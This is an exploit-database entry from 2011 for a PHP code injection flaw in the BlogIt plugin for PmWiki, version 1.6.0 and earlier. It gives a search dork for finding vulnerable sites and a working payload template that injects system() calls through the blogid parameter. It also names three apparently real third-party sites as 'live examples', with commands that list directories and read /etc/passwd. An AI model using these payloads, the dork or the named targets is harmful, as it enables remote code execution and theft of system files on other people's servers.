BlogIt <= 1.6.0 Php Code Injection Vulnerability



EKU-ID: 648 CVE: OSVDB-ID:
Author: Ux0r Published: 2011-06-30 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


===================================================================
BlogIt <= 1.6.0 Php Code Injection Vulnerability
===================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Ux0r
#[+] E-mail          : ux0r@live.com
#[+] Home            : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message         : Benim eski indekslerin üzerine yazmaya çalýþan lamerlere selam olsun. Beni güldürdünüz :)

Product : BlogIt
Version : <= 1.6.0
Site    : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork    : "powered by blogIt"


 = Error in file Site.BlogList =

Error code: (Line 11)

text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)

A vulnerable parameter $bi_BlogId


 = Exploit =

- http://site.com/path/Site/BlogList?blogid=${@print(...)}  ; ... => php code injection

	
 = Example =

- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}

 = Live examples =
 
- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}

 < Esenlikler dilerim. 2 bin 11 >